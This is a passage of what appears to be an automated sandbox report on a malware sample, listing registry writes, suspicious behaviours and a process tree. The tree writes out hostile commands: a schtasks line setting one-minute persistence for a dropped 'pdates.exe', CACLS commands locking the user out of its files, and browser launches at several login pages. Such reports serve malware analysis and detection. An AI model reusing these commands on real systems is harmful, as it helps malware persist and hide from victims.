| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\41DC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe
"C:\Users\Admin\AppData\Local\Temp\3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8792114.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8792114.exe
C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
"C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "Admin:N"&&CACLS "pdates.exe" /P "Admin:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "Admin:N"&&CACLS "..\925e7e99c5" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "pdates.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "pdates.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\925e7e99c5" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\925e7e99c5" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8698530.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8698530.exe
C:\Users\Admin\AppData\Local\Temp\B07.exe
C:\Users\Admin\AppData\Local\Temp\B07.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C12.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\En1HV4Ys.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\En1HV4Ys.exe
C:\Users\Admin\AppData\Local\Temp\CAF.exe
C:\Users\Admin\AppData\Local\Temp\CAF.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sd7uw5fi.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sd7uw5fi.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uL6Fa5TM.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uL6Fa5TM.exe
C:\Users\Admin\AppData\Local\Temp\D9A.exe
C:\Users\Admin\AppData\Local\Temp\D9A.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq3gO0Jh.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq3gO0Jh.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1vI31WE5.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1vI31WE5.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ni780Ph.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ni780Ph.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1132 -ip 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2492 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,13871048679609058972,17756050613323681868,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd8,0x110,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffed11f46f8,0x7ffed11f4708,0x7ffed11f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,12403785969331716907,9570262270196857694,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
